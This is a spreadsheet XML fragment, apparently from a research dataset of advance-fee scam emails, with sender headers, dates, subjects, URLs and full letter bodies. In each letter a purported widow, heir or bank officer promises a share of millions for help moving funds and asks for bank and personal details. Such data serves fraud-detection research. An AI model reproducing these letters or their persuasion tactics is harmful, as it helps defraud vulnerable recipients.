    <t>Tres Cher ,\n\nJe suis mlle GOBLOUSO SOLANGE  la  fille de feu GOBLOUSO REMI.\nJe t écris avec une confidence absolue premièrementpour demander ton assistance pour\ntransférer mon argent d une valeur  de (5 000 000 de dollards us )qui actuellement se trouve dans le coffre fort d'une compagnie de sécurité ici en Abidjan dans votre pays jusqu'à mon arrivée chez vous. mon seul espoir actuellement est en toi et en la boitedéposé dans la compagnie de sécurité.\nAvant la mort de mon pére le mardi 09 novembre 2004 dans un hôpital privé ici à Abidjan il ma secrètement appelé de côté ,moi et mon petit frere David et m'a revelé qu'il a la somme de (5 000 000 de dollards us ) dans une compagnie de securité ici à Abidjan, et que\n\n\nje suis son heritiere . Il ma également expliqué que c'était en raison de cette richesse qu'il a été agressé et battu et qu'il es sur et certain que se sont  des proches du clan presidentiel . il ma conseillé que je devrais chercher un associé ou une associée  étranger dans un pays de mon choix où je transférerai cet argent et\nl'emploierai dans le but d'investir dans la gestion de biens immobiliers ou la gestion d'hôtel. \n\nA cet effet, je sollicite humblement votre assistance dans le sens suivant :\n1- m'aider à faire sortir la boite de la compagnie de sécurité comme CO- bénéficiaire pour transférer cet argent en votre nom  dans votre pays pour un investissement lucratif  avec vous comme principal acteur.\n2- Le plus important c'est que la compagnie de Sécurité ne connaît pas le contenu exact de la boite\nparce quil la déclaré comme contenant des effets de familles. \n3- Tous les documents relatifs au dépôts sont avec moi dans mon coffre a la maison. \n4- Pour ton assistance, je te céderai 20% de cet argent pour vos efforts et votre assistance.\n5- Enfin je tes prie de garder cette transaction strictement confidentiel. \n\nMerci et que Dieu vous bénisse pour votre assistance à\nnotre égard. \n\nTrès sincèrement\n\nSolange\n\n\n\nLas nuevas aventuras de Harry Potter, a un clic! [URL]http://www.starmedia.com[/URL]</t>
  </si>
  <si>
    <t>http://www.starmedia.com</t>
  </si>
  <si>
    <t>2965</t>
  </si>
  <si>
    <t>To: nan\nFrom: Andrew Clark &lt;robertclark1900@yahoo.com.hk&gt;\nDate: Thu, 15 Mar 2007 07:08:13 -0000</t>
  </si>
  <si>
    <t>Thu, 15 Mar 2007 07:08:13 -0000</t>
  </si>
  <si>
    <t>Andrew Clark &lt;robertclark1900@yahoo.com.hk&gt;</t>
  </si>
  <si>
    <t>\n\n\nDear sir/Madam,\n\nI have the honour and confidence to introduce this business to you in view\nof the fact that you are trustworthy and reliable as my inquires reveals.\n\nI am Mr. Andrew Clark I work in the Foreign Payment Department of the\nNational WestMinster Bank here in London Uk. There is an account opened in\nthis bank in 1994 but since 1998 nobody has operated on this account\nagain. After a private and intensive investigation, I discovered that the\nowner of this account (Mr. Chapman Mark J.) was an oil merchant - a\nforeigner, who died since 1998 without having a beneficiary to this\naccount.\n\n[URL]http://cnnstudentnews.cnn.com[/URL]\n[URL]http://cnnstudentnews.cnn.com[/URL]\n\nMy investigation proved to me he never informed any of his family members\nabout this funds and he also did not have any next of kin to the said\nfunds. The amount in this account is  Fifty Five Million Five Hundred\nThousand British Pound sterling. Since no one has come forth to claim\nthese funds, the bank management is willing to welcome any foreigner who\nhas correct information to this Account which I will give upon receipt of\nyour positive response towards my proposal. I assure you a 100% that there\nis no risk to this business. After its conclusion I will retrieve all\ndocuments used in the transfer and destroy them in your presence, when I\ncome over to your account base for sharin of funds and possible\ninvestment.\n\nSharing will be 30% for you, 0.5% for any expenses incurred during this\nbusiness 30% for charity organizations because this was one of the things\nhe made known to me personaly before he died in the plane crash while the\nremaining 35% for me. As soon as I hear from you I will put up an annual\nleave so I could be able to facilitate the transfer of this fund to any\nAccount of your choice.\n\nContact me urgently for the way forward.\n\nThanks.\n\nAndrew Clark.\n\n\n</t>
  </si>
  <si>
    <t>http://cnnstudentnews.cnn.com http://cnnstudentnews.cnn.com</t>
  </si>
  <si>
    <t>1640</t>
  </si>
  <si>
    <t>To: nan\nFrom: FROM MR HASSAN DIOUF &lt;hassan_diouf@yahoo.com&gt;\nDate: Thu, 15 Dec 2005 21:53:50 +0100</t>
  </si>
  <si>
    <t>Thu, 15 Dec 2005 21:53:50 +0100</t>
  </si>
  <si>
    <t>FROM MR HASSAN DIOUF &lt;hassan_diouf@yahoo.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> \n\n\n \n\n \n\n\n\n\n\n\n \n\nGreeting,\nSir,\nI am contacting you believing you are a honest and trustworthy person.I believe you will not betray the confidence I am willing to repose in you, for me to have contacted you even though we've not met before.\nMy name is Hassan diouf,the only son of late Mr.Mohammed Diouf who was the chairman /President/CEO,Cacao-Cafe &amp; Agro-Alimentary industries plc.SCAFECAO)"Bouake" and ex-owner of Polyclinic LA-MADONNE, of the Republic of Cote d'Ivoire.\nYou can find the story on this website:[URL]http://news.bbc.co.uk[/URL]\nOn 19th of September 2002,a group of so called rebels took over the city of Bouake to over-throw the Government of Mr.Laurent Gbagbo the President of Cote d'Ivoire. On the 20th day morning at about 4:18am some fractions of the same group of rebels break into our house and killed our security guard and pass-through the gate entrance to the main building and took my father away to an un-known destination.\nAfter about four hours later we found him (my father) at the road side, by then he had been totally beaten and was bleeding to death lying in the pool of his own blood. From there, we rushed him to a near by hospital and hours later he sent for my mother. So he told her that he can not make it from the doctors diagnosis, he also told her that it was because he (my father) was not from the northern part of the country that he has been treated this way and also being a political activist. And again he said he is suspecting some of his business partners for conspiracy and this sort of brutality. He also told my mother that he deposited a huge amount of money i.e US$ 10.5million dollars(Ten million five hundred thousand us dollars only) into a Bank in the Capital city of Dakar Senegal he also told my mother where he kept the whole documents concerning this deposit that is made for investment purpose in the western world.\nThat same day, he (my father) gave up the ghost. Then with the help of the French soldiers, we escaped to Senegal, where we are now. I am now contacting you believing you are honest and trustworthy to help us to receive the money in your account for investment, I and my mother has decided in compensating you 30%of the total amount for your assistance .\nPlease do take your time to go through the mail and get back to us, so that I will simply introduce you to the Bank where the fund are being kept now for onward transfer. So you can contact me through my alternate email adress for security reason.\nEmail hassan_diouf@walla.com am waiting for your response.\nThanks and God bless.\nHassan Diouf .\nFor the Family's\n \n \n \n \n \n \n\n\n\n\n</t>
  </si>
  <si>
    <t>1637</t>
  </si>
  <si>
    <t>To: R@M\nFrom: ELIZABETH GARANGE &lt;elig7@tiscali.it&gt;\nDate: Thu, 15 Dec 2005 13:50:14 +1200</t>
  </si>
  <si>
    <t>Thu, 15 Dec 2005 13:50:14 +1200</t>
  </si>
  <si>
    <t>ELIZABETH GARANGE &lt;elig7@tiscali.it&gt;</t>
  </si>
  <si>
    <t>URGENT CONTACT</t>
  </si>
  <si>
    <t>Dear Friend, \n \nI am Mrs Elizabeth Garang, the wife of the Sudan's vice President John\nGarag who was killed in an helicopter\ncrash on August 1, 2005 .I am currently in Kenya, where I am taken refugee\nwith my son Philip Garang. \n\nWe ran from Sudan because the incumbent government of Sudan want my son and\n\ni killed because my husband was striving hard For the liberation of\nsouthern Sudan. I want to \nconfide in you if you can assist me to receive a trunk box of treasure box\ncontaining $25,000,000,USD \nwhich my late husband deposited with a diplomatic courier service for\nonward delivery to purchase \narms for the liberation army. \n \nThe diplomat is will deliver the trunk boxes in your country in a few days\nand i want you to front as my beneficiary \nto claim this trunk box before i arrive to your country, and this deposit\nwas made under my son's name as the \nnext of kin. This consignment was deposited under class U.P.C meaning\nundisputed private consignment that is to \nsay the diplomatic courier service is ignorant of the true contents of the\nconsignment because, the contents was \ndeclared as an African arts. \n\nUpon request I will scan and send to you the certificate of deposit for\nyour perusal before the transaction \ncommences. Considering the effort you will put in the transaction, we are\nwilling to concede 25% of the money \nto you as compensation, while remaining 75% will be for i and my son\nPhilip. \n \nIf you are ready you assist me ,please send me your phone number and your\nresident address so that i can forward \nit to the diplomat as my son's beneficiary as my i will instruct the\nofficer in charge to deliver the consignment to you in \nyour place on my behalf if only you are not going to betray us at the end. \n \nYou can visit this website to know more about my later husband. \n \n[URL]http://www.sudantribune.com[/URL] \n[URL]http://www.sudantribune.com[/URL] \n[URL]http://politics.yahoo.com[/URL]\n1 \n[URL]http://nazret.com[/URL]\nb=1 \n[URL]http://newvision.co.ug[/URL] \n \nPlease write me back through my private email address. below. \n \nelizabethg637@netscape.net \n\nI await to hear from you soon. \n \nThanks. \n \nMrs. Elizabeth Garang. \n\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.sudantribune.com http://www.sudantribune.com http://politics.yahoo.com http://nazret.com http://newvision.co.ug</t>
  </si>
  <si>
    <t>2512</t>
  </si>
  <si>
    <t>To: nan\nFrom: abdul idrisa030 &lt;abdulidrisa030@hotmail.fr&gt;\nDate: Thu, 14 Sep 2006 20:46:34 +0200</t>
  </si>
  <si>
    <t>Thu, 14 Sep 2006 20:46:34 +0200</t>
  </si>
  <si>
    <t>abdul idrisa030 &lt;abdulidrisa030@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>FROM:MR.ABDUL IDRISA.\nAFRICAN DEVLOPEMENT BANK\nBURKINA FASO (ADB)\nOUAGADOUGOU-BURKINA FASO.\n\nDEAR FRIEND,\n\nIT WILL BE A SURPRISE FOR YOU TO RECEIVE THIS MAIL. WELCOME THIS LETTER IN \nTHE NAME OF ALLAH.\n\nI AM  MR.ABDULIDRISA,THE DIRECTOR OF THE ACCOUNTS &amp; AUDITING DEPT.AT THE \nAFRICAN DEVLOPEMENT BANK OUAGADOUGOU-WEST AFRICA. WITH DUE RESPECT I HAVE \nDECIDED TO CONTACT YOU ON A BUSINESS TRANSACTION THAT WILL BE BENEFICIAL TO \nBOTH OF US. AT THE BANK'S LAST ACCOUNTS/AUDITING EVALUATIONS,MY STAFFS CAME \nACROSS AN OLD ACCOUNT WHICH WAS BEING MAINTAINED BY A FOREIGN CLIENT WHO WE \nLEARNT WAS AMONG THE DECEASED PASSENGERS OF AN AIRLINE CRASH ON 6TH NOV. \n2002.SINCE THE DECEASED WAS UNABLE TO RUN THIS ACCOUNT SINCE HIS DEATH.THE \nACCOUNT HAS REMAINED DORMANT WITHOUT THE KNOWLEDGE OF HIS FAMILY SINCE IT \nWAS PUT IN A SAFE DEPOSIT ACCOUNT IN THE BANK FOR FUTURE INVESTMENT BY THE \nCLIENT. SINCE HIS DEMISE,NOBODY,NOT EVEN THE MEMBERS OF HIS FAMILY HAVE \nAPPLIED FOR CLAIMS OVER THIS FUND AND IT HAS BEEN IN THE SAFE DEPOSIT \nACCOUNT UNTIL WE DISCOVERED THAT IT CANNOT BE CLAIMED SINCE OUR CLIENT IS A \nFOREIGN NATIONAL AND WE ARE SURE THAT HE HAS NO NEXT OF KIN HERE TO FILE \nCLAIMS OVER THE MONEY.AS THE DIRECTOR OF THE DEPT,THIS DISCOVERY WAS BROUGHT \nTO MY OFFICE SO AS TO DECIDE WHAT IS TO BE DONE.WITH THE FEW PERSONEL IN MY \nDEPT,WE DECIDED TO SEEK WAYS THROUGH WHICH TO TRANSFER THIS MONEY OUT OF THE \nBANK AND OUT OF THE COUNTRY TOO.\n\nTHE TOTAL AMOUNT IN THE ACCOUNTS IS TEN MILLION FIVE HUNDRED THOUSAND \nDOLLARS(USD 10,500,000.00).WITH OUR POSITIONS AS STAFFS OF THE BANK,WE ARE \nHANDICAPPED BECAUSE WE CANNOT OPERATE FOREIGN ACCOUNTS AND CANNOT LAY \nBONAFIDE CLAIM OVER THIS MONEY.WHILE WE WERE CONTEMPLATING ON WHAT TO DO,A \nFRIEND OF MINE WHO WORKS WITH THE CHAMBER OF COMMERCE AND INDUSTRY \nRECOMMENDED YOUR PERSONALITY TO ME AND ADVISED I SHOULD ASK YOU FOR HELP TO \nTRANSFER THIS MONEY OUT OF THE COUNTRY.THE CLIENT IS A FOREIGN NATIONAL AND \nYOU WILL ONLY BE ASKED TO ACT AS HIS NEXT OF KIN AND I WILL SUPPLY YOU WITH \nALL THE NECESSARY INFORMATIONS AND BANK DATA TO ASSIST YOU IN BEING ABLE TO \nTRANSFER THIS MONEY TO ANY BANK OF YOUR CHOICE WHERE THIS MONEY COULD BE \nTRANSFERED INTO.\n\nI AND MY PARTNERS HAVE DECIDED TO GIVE AWAY FOURTY %(40%)TO YOU FOR YOUR \nASSISTANCE AND TEN (10%) FOR ANY EXPENSES THAT MIGHT ARISE DURING THE \nTRANSACTION OF THIS TRANSFER.WE WANT TO ASSURE YOU THAT THIS TRANSACTION IS \nABSOLUTELY RISK FREE SINCE WE WORK IN THIS BANK WHICH IS WHY YOU SHOULD BE \nCONFIDENT IN THE SUCCESS OF THIS TRANSACTION BECAUSE YOU WILL BE UPDATED \nWITH INFORMATION AS AT WHEN DESIRED.\n\nWE WILL PLEASE WISH YOU KEEP THIS TRANSACTION SECRET AS WE ARE HOPING TO \nRETIRE WITH OUR SHARE OF THIS MONEY AT THE END OF TRANSACTION WHICH WILL BE \nWHEN THIS MONEY IS SAFELY IN YOUR ACCOUNT. WE WILL THEN COME OVER TO YOUR \nCOUNTRY FOR SHARING ACCORDING TO THE PREVIOUSLY AGREED PERCENTAGES.YOU MIGHT \nEVEN HAVE TO ADVISE US ON POSSIBILITIES OF INVESTMENT IN YOUR COUNTRY OR \nELSEWHERE OF OUR CHOICE.MAY ALLAH HELP YOU TO HELP US TO A RESTIVE\nRETIREMENT.AMEN.\n\nPLEASE FOR FURTHER INFORMATIONS AND ENQUIRIES FEEL FREE TO CONTACT ME \nTHROUGH MY EMAIL ADRESS abdul_idrisa100@yahoo.com\nOR CALL ME ON THIS NUMBER 00 226 78 87 88 66 FOR ORAL DISCUSSION.\n\nAM AWAITING FOR YOUR URGENT RESPONSE!!!\n\nTHANKS AND REMAIN BLESSED.\n\nMR.ABDUL   IDRISA\n\n_________________________________________________________________\nDcouvrez Windows Live Messenger : le futur de MSN Messenger ! \n[URL]www.windowslivemessenger.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2513</t>
  </si>
  <si>
    <t>To: nan\nFrom: estelle mamadou &lt;estelle21_mam@hotmail.fr&gt;\nDate: Thu, 14 Sep 2006 19:36:20 +0000</t>
  </si>
  <si>
    <t>Thu, 14 Sep 2006 19:36:20 +0000</t>
  </si>
  <si>
    <t>estelle mamadou &lt;estelle21_mam@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>My appreciation to you.</t>
  </si>
  <si>
    <t>#45 Rue Grand Yorf,\nDAKAR, SENEGAL.\n\nAssalamaulakum.\n\nMy Dear Friend,\n\nCompliments of the day.I did like to send to you the best wishes of good \nhealth and success in your pursuits particularly through my proposal as \ncontained in this letter. After due deliberation with my son,I decided to \nforward to you this business proposal, we want you to assist us .I will give \nyou more information. As to this regard as soon as you reply.\n\nI am Mrs.Estelle Mamadou . I am contacting you with the hope that you will \nbe of great assistance to me, I currently have within my reach the sum of \n7.3 million U.S dollars cash which I intend to use for investment purposes.\n\nI therefore personally appeal to you seriously and religiously for your \nurgent assistance to move this money in to your country where I believe it \nwill be safe since I cannot leave the country due to the restriction of \nmovement imposed on the members of my family by the Senegal Government.\n\nThis money came as a result of a payback contract deal between my husband \nand a Russian firm in our country.The Russian partners returned my husbands \nshare .Presently, the Government has intensified their probe in to my \nhusbands financial resources which has led to the freezing of all our \naccounts, local and foreign, the revoking of all our business licences and \nthe arrest of my First son.\n\nIn view of this I want to acted very fast to withdraw this money from one of \nour finance houses before it will be closed down.My husband deposited the \nmoney in a finance firm for safe keeping . No record is known about this \nfund by the government because there is no documentation showing that we \nhave such funds.\n\nFurther more, my elder son have been in detention in the last four years \nfollowing the death of my late husband for charges of State organized murder \nand corrupt practices. he was just been released by the Supreme Court after \nthe president brokered a deal with my family regarding his freedom. and he \nis still under interrogation about my late husband's assets and some vital \ndocuments.\n\nDue to the current situation in the country and government attitude to my \nfamily,I cannot make use of this money within, thus I seek your help in \ntransferring this funds out for investment than leaving the fund here and to \ninvest the money to profit my family Bearing in mind that you may assist \nme.l have decided to part with 25% of the total sum.\n\nI am seriously considering to settle down abroad in a friendly atmosphere \nlike yours as soon as this fund get into your account so that I can start \nall over again if only you wish. I shall ask my son Mohammade to come over \nto your country to liaise with you. If this proposal satisfies you. please \ndo not let me out to the security as I am giving you this information in \ntotal trust and confidence.\n\nPlease kindly reply by return mail and please include your personal \ntelephone and fax numbers. Conclusively,we have decided part with 25% of the \ntotal sum. of the total sum,10% will be for expenses incurred during \nthecause of this transaction, while 65% is to be held on trust by you until \nwe can decide on a suitable business investment in your country subsequent \nto our free movement by the Senegal Government.\n\nI will greatly appreciate if you accept my proposal in good faith.\nYour URGENT response is needed.\n\nRegards and God Bless you.\n\nMrs.Estelle Mamadou .\n\n_________________________________________________________________\nDcouvrez Windows Live Messenger : le futur de MSN Messenger ! \n[URL]www.windowslivemessenger.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2509</t>
  </si>
  <si>
    <t>To: nan\nFrom: aziz koffi &lt;aziz_koffi19@hotmail.com&gt;\nDate: Thu, 14 Sep 2006 13:59:18 +0000</t>
  </si>
  <si>
    <t>Thu, 14 Sep 2006 13:59:18 +0000</t>
  </si>
  <si>
    <t>aziz koffi &lt;aziz_koffi19@hotmail.com&gt;</t>
  </si>
  <si>
    <t>HELLO FROM  AZIZ KOFFI  URGENT REPLY  PLS</t>
  </si>
  <si>
    <t>From The Desk Of AZIZ KOFFI Senior Staff In File Department,African Development Bank A.D.BOuagadougou Burkina-FasoWest Africa. This is my private e mail aziz_koffi@latinmail.com Private Number......00226 76 17 22 04.PLANE CRASH WEB SITE [URL]http://www.cnn.com[/URL]    ( "REMITTANCE OF $15 MILLION U.S.A DOLLARS     CONFIDENTIAL IS THE CASE")Compliment Of The Season,On a very good day. I am (AZIZ KOFFI) a seniorstaff in file department in African developent bank (ADB).I got yourcontact from a Yahoo Tourist Search.When i was searching for a foreign partner i assured ofyour capability and reliability to champion this businees opportunity wheni prayed  to God or Allah about you.In my department we discovered an abandoned sum of $ 15 million U.S.A dollars ( fifteen million U.S.A dollars) . In an account that belongs to one of our foreign customer who died along with his entire family in (friday december 26,2003  ) in a plane crash. Since we got information about his death,    we have been expecting his next of kin to come over and claim his money because we cannot release it unless somebody applies for it as next of kin or relation to the deceased asindicated in our banking guidelines, but unfortunately we learnt that all his supposed next of kin or relation died alongside with him at theplane crash leaving nobody behind for the claim. It is therefore upon this discovery that I and one official in my department now decided to make this businness proposal to you and release the money to you as the next of kin or relation to the deceased for safety and subsequent disbursement since nobody is coming for it and we dont want this money to go into the bank treasury as unclaimed bill.    The Banking law and guideline here stipulates that if such money remained unclamed after five years, the money will betransfered into the Bank treasury as unclaimed fund. The request of foreigner as next of kin in this business is occasioned by the fact that the customer was a foreigner, and a Burkinabe cannot stand as next of kin to a foreigner. We agree that 30 % of this money will be for you as foreign partner, in respect to the provision of a foreign account, 10 % will be set aside for expenses incured during the business and 60 % would be for;me and my woman colleague. There after I and my colleague will visityour country for disbursement according to the percentages indicated.Therefore to enable the immediate trnansfer of this fund to you asarranged, you must apply first to the bank as relations or next of kin of  the deceased indicating your bank name, your bank accountnumber, your private telephone and fax number for easy and effective communication and location where the money will be remitted.Upon receiptof your reply, I will send to you by fax or email the text of theapplication I will not fail to bring to your notice that this transaction is hitch free and that you should not entertain any atom of fear as all required arrangements have been made for the transfer.You should contact me on my number 00226 76 17 22 04.immediately as soonas you receive this letter. reply me with this e mail address aziz_koffi@latinmail.com immediately. Yours faithfully,AZIZ KOFFI   POST SCRITUM:You have to keep everything secret as toenable thetransfer to move very smoothly in to the account you willprove to the bank.As you finished reading this letter call meimmediately so that we discuss very well over this business.Please call me and inform me that you received my mail, because i don't go to net always..........................................................................................MSN Messenger  : appels gratuits de PC  PC partout dans le monde !</t>
  </si>
  <si>
    <t>2507</t>
  </si>
  <si>
    <t>To: nan\nFrom: ateeq khan &lt;ateeq_khan11@plasa.com&gt;\nDate: Thu, 14 Sep 2006 05:24:29 +0700</t>
  </si>
  <si>
    <t>Thu, 14 Sep 2006 05:24:29 +0700</t>
  </si>
  <si>
    <t>ateeq khan &lt;ateeq_khan11@plasa.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Essalamou aalaykoum </t>
  </si>
  <si>
    <t>Dear Friend,\n\nThis letter must come to you as a big surprise, but I \nbelieve it is only a day that people meet and become great \nfriends and business partners.\n\nI am Mr. Ateeq Rahman KHAN, currently Head of Corporate \naffairs with a reputable bank here in Dubai -U. A. E. I \nwrite you this proposal in good faith, believing that I \ncan trust you with the information I am about to reveal to \nyou.\n\nI have an urgent and very confidential business \nproposition for you. On November 6, 2000, an Iraqi Foreign \nOil consultant/contractor with the CHEVRON PETROLEUM \nCORPORATION, MR. KHALIL AL NASSER made a (Fixed deposit) \nfor 36 calendar months, valued at  US$17,500,000.00 \n(Seventeen Million Five hundred Thousand Dollars only) in \nmy bank and I happen to be his account officer before I \nwas moved to my present position recently.\n\n  Upon maturity in 2003, as his account officer and as \nwell the bank manger, it is my duty to notify him on the \nmaturity date so I sent a routine notification to his \nforwarding address but the letter was returned \nundelivered.\n\nAfter sometime, I tried sending back the letter, but it \nwas again returned and finally I discovered from his \ncontract employers, Chevron Petroleum Corporation that Mr. \nKhalil Al Nasser died as a result of torture in the hand \nof Saddam Hussein (former Iraqi President) during one of \nhis trips to his country Iraq, as he was accused of \nleaking information to the Americans. On further \ninvestigation, I discovered that Mr. Al Nassers family \nwife and two sons died during the Gulf War in Iraq and was \nthe reason why he did not declare any next of kin or \nrelation in all his official documents, including his Bank \nDeposit paperwork in my Bank and did not leave any\nWILL. This sum of US$17,500,000.00 have been floating and \nplaced under dormant/unserviceable account by my bank \nmanagement since no one have heard from the owner since \n2003.\n\n  I wish to let you know that all the investigation I have \nmade so far, my bank management is not aware of it, I am \nthe only one that have the information.\nWith the recent change of government in my country and \nwith their efforts to support the United Nations in \ncheckmating terrorism aid in the U. A. E. By end of this \nyear, the government will pass a new financial control law \nwhich will give the government authority to interrogate \naccount owners of above $5,000,000.00 to explain the \nsource of the funds, making sure it is not for terrorism \nsupport. If I do not move this money out of the country \nimmediately, by end of the year the government will \ndefinitely confiscate the money, because my bank cannot \nprovide the account owner to explain the source of the \nmoney. I cannot directly transfer out this money without \nthe help of a foreigner and that is why I am contacting \nyou for an assistance.\n\n  As the Account Officer to late Al Nasser, coupled with \nmy present position and status in the bank as Head of \nRetail Banking Group, I have the power to influence the \nrelease of the funds to any foreigner that comes up as the \nnext of kin to the account, with the correct information \nconcerning the account, which I shall give you. All \ndocuments to enable you claim this fund will be carefully \nworked out and there is practically no risk involved, the \ntransaction will be executed under a legitimate \narrangement that will protect you from any breach of law, \nbeside U. A. E is porous and anything goes.\n\nIf you accept to work with me, I want you to state how you \nwish us to share the funds in percentage, so that both \nparties will be satisfied. If you are interested, contact \nme as soon as you receive this message so we can go over \nthe details. Thanking you in advance and may God bless \nyou.\n\nPlease, treat with utmost confidentiality. I shall send \nyou copy of the deposit certificate issued to Al Nasser \nwhen the deposit was made for your perusal.\nI wait your urgent reply through my private emailaddress:\n\nRegards,\nMr. Ateeq Rahman KHAN.\n=================================================================\nIkuti lomba Puisi Online dan Desain Kartu Elektronik\nKeterangan lebih lanjut, silakan buka\n[URL]http://www.plasa.com[/URL]\n=================================================================\n\n\n</t>
  </si>
  <si>
    <t>http://www.plasa.com</t>
  </si>
  <si>
    <t>947</t>
  </si>
  <si>
    <t>To: nan\nFrom: Mrs At .Reb &lt;reb2009@free.com.pe&gt;\nDate: Thu, 14 Oct 2004 00:19:38 -0500</t>
  </si>
  <si>
    <t>Thu, 14 Oct 2004 00:19:38 -0500</t>
  </si>
  <si>
    <t>Mrs At .Reb &lt;reb2009@free.com.pe&gt;</t>
  </si>
  <si>
    <t>Msg from Mrs Atkins</t>
  </si>
  <si>
    <t>Dear Madam/Sir,\nI greet you in the Name of GOD.\nI am MRS REBECCA ATKINS from South Africa.\nI am married to Late MR SMITH ATKINS of\nblessed memory who was an oil explorer in\nKuwait and Brunei for fifteen years before\nhe died in the year 2000.\nWe were married for twelve years without a\nchild. He died after a brief illness that\nlasted for only four days. Before his death\nwe were both devoted to our God and respect\nother who serve him.\nSince his death, I too have been battling with\nboth Cancer and fibroid problems. When my late\nHusband was alive he Deposited the sum of\n$18.5million (Eighteen Million, Five Hundred\nthousand U.S Dollars) with a Deposit Company\nin Europe.the money is deposited as Family\nValuables/Treasure for security reasons.\nRecently, my doctor told me that I have only six\nmonths to live due to my cancer problem, and this\nlead to a stroke attack which bother me most though\nbecause I cannot move as I use to.\nHaving known my condition I decided to entrust this\nfund to either a philanthropic organization or\ndevoted individual that will utilize this money\nthe way I am going to instructs herein.30% of the\nUS$18.5million goes to you to ensure that you are\nprepared for the task ahead, 60% of this money will\nbe used in all sincerity to fund philanthropic\norganization, orphanages, widows and 5% will go to\nthe family Attorney who will prepare the Authorisation\nand the balance 5% sent to me to at least prepare for\nmy funeral and off-set my medical bills.\nI am taking this decision because I don't have any\nchild or devoted relations whose behavior has left\nmuch to be desired while I am ill and above all I\ndon't want a situation where this money will be\nused in an UnGodly manner,hence this bold decision.\nSince my health is Retrogressing by the minute,\nyou will have to send your POSTAL ADDRESS, CONTACT\nPHONE NUMBER AND FAX and a little details about\nyourself, because I got your address from the internet\nafter a thorough search.\nAs soon as I receive this information from you I\nwill make arrangement to prepare the Authorization\nthrough the family Attorney for you to get Possession\nof the Deposit. As soon as I receive your reply to my\nconfidential email address.\n                 reb_atkins01@cotas.net\nand the authorization is given to you by me, I will\ngive you the name and  contact of the Deposit company\nwhere the money was Deposited in Europe, for claims\nto the consignment.\nUntil I hear from you, I pray that this letter bring\nyou and your family good tiding while my dreams to help\nhumanity rest squarely on your shoulders.\nMay the Almighty God continue to guide and protect you.\n\nRemain Blessed,\nMRS REBECCA ATKINS.\nNOTE; All replies should be forwarded to my\nconfidential email address:\nreb_atkins01@cotas.net\n\n\n\n-----------------------------------------\nInternet gratis en: [URL]http://www.free.com.pe[/URL]\nAmericatel Internet Free\nTu conexión Free más rápida\n\n\n</t>
  </si>
  <si>
    <t>http://www.free.com.pe</t>
  </si>
  <si>
    <t>15</t>
  </si>
  <si>
    <t>To: webmaster@aclweb.org\nFrom: MRS MARIAM ABACHA &lt;elixwilliam@usa.com&gt;\nDate: Thu, 14 Nov 2002 16:46:11 +0100</t>
  </si>
  <si>
    <t>Thu, 14 Nov 2002 16:46:11 +0100</t>
  </si>
  <si>
    <t>MRS MARIAM ABACHA &lt;elixwilliam@usa.com&gt;</t>
  </si>
  <si>
    <t>TRUST TRANSACTION</t>
  </si>
  <si>
    <t>Dear Sir,\n\nA Very Good day to you   \n\nI am Mrs Mariam Abacha. I got your contact from a\nclose Associate of mine who works with the Nigerian\nChamber of Commerce and Industry  who visited your\ncountry for an International Trade Fair upon my quest\nfor a trusted and reliable foreign businessman or\ncompany. \nHe however gave me the assurance that you can be\ntrusted to handle a transaction of this magnitude.\nFollowing the sudden death of my husband General Sani\nAbacha the late Former Head of State of Nigeria in\n1998, I have been thrown into a state of utter\nconfusion, frustration and hopelessness \nby the present civilian administration, I have been\nsubjected to physical and psychological torture by the\nsecurity agents in the country. \nAs a widow that is so traumatized, I have lost\nconfidence with anybody within the country. You must\nhave heard over the media reports and the internet on\nthe recovery of various huge sums of money deposited\nby my husband in different security firms abroad, some\ncompanies willingly give up their secrets and\ndisclosed our money confidently lodged there or many\noutright blackmail. In fact the total sum discovered\nby\n the Government so far is in the tune of $700. Million\ndollars. And they are not relenting to make me poor\nfor life. I will give you more information  as to this\nregard as soon as you reply. I repose great confidence\nin you hence my approach to you due to security\nnetwork placed on my day to day  affairs I cannot\nafford to visit the embassy so that is why I decided\nto contact you and I hope you will not betray my\nconfidence in you. I have deposited  the sum of US$35\nmillion dollars with a security firm abroad whose name\nis withheld for now until we open communication. I\nshall be grateful if you could receive this fund into\nyour account for safekeeping. This arrangement is\nknown to you and my family lawyer who shall deal\ndirectly with you as I am still under house arrest. I\nam seriously considering to settle down abroad as soon\nas this fund get into your account so that I can start\nall over again if only you wish, but if it is\npossible, \njust help me in diverting this funds into your bank\naccount which will accrue you 20% of this fund. Please\nhonesty is the watchword in this transaction. And\nshould you accept my terms, kindly send me an email\nsignifying your interest to my email box as this is\nonly safe for me now so that we can commence\n communication immediately. And upon receipt of your\nmessage of interest, I shall give you a more detailed\npicture of things. In case you don't accept please do\nnot let me out to the security as I am giving you this\ninformation in total trust and confidence.NO RISK IS\nINVOLVED AS IAM STILL IN CONTROL OF MY HUSBANDS\nAFFAIRS. I will greatly appreciate if you accept my\nproposal in good faith. \n\nPlease expedite action.    \n\nPrefer all further correspondence be sent via\npresidentwifeng@indiatimes.com but please copy this email:profadams@\nusa.com\n\nsincerely yours   \n\nHajia Mariam Abacha.    \nfor certain comfirmations. Please logg into this internet sites\n[URL]www.swissmoney.net[/URL] and [URL]www.thisdayonline.com.ng[/URL]\nclick on archive, then click on 2001, click on march 10th,\n\n\n\n\n</t>
  </si>
  <si>
    <t>www.swissmoney.net www.thisdayonline.com.ng</t>
  </si>
  <si>
    <t>3131</t>
  </si>
  <si>
    <t>To: nan\nFrom: muhammd amin &lt;muhammd_amin30@hotmail.fr&gt;\nDate: Thu, 14 Jun 2007 10:00:43 +0200</t>
  </si>
  <si>
    <t>Thu, 14 Jun 2007 10:00:43 +0200</t>
  </si>
  <si>
    <t>muhammd amin &lt;muhammd_amin30@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>I AM URGENTLY WAITING FOR YOUR CALL OR EMAIL</t>
  </si>
  <si>
